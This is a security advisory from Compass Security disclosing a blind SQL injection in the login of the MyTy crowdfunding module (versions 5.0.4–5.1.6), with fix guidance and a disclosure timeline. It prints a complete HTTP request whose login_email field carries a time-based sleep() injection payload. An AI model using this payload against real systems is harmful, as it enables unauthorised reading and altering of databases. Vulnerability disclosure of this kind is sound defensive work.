CSNC-2017-029 MyTy Blind SQL Injection

From: Advisories <advisories@compass-security.com>
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>,bugs@securitytracker.com <bugs@securitytracker.com>
Cc:
Subject: CSNC-2017-029 MyTy Blind SQL Injection
Date:


#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date:     21.11.2017
#
#############################################################

Introduction:
-------------
MyTy[1] is a software framework that includes a crowdfunding module. It can be 
installed on a customer server and used to create whitelabel websites for 
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding 
module login process that allows an unauthenticated attacker to execute 
arbitrary SQL query against the database. This allows to read and modify the 
whole database, within the privilege limitations of the database user executing 
the queries.


Affected:
---------
Vulnerable:
 * MyTy 5.0.4 to 5.1.6
 
 
Technical Description
---------------------
During the login process, the user email and password are sent in a POST 
request. In this request, the login_email parameter is concatenated into an SQL 
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following 
request:
===============
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
&type=simpleLogin&activeTab=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
 lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; 
 _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; 
 cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F
&login_type=inline&popin=1&type=simpleLogin
&login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234
===============


Workaround / Fix:
-----------------
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL 
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a 
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
---------
2017-11-21:     Coordinated public disclosure date
2017-09-06:     Release of fix in versions 5.0.12 and 5.1.7
2017-09-06:     Initial vendor response
2017-09-06:     Initial vendor notification
2017-09-06:     Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap





Copyright © 1995-2017 LinuxRocket.net. All rights reserved.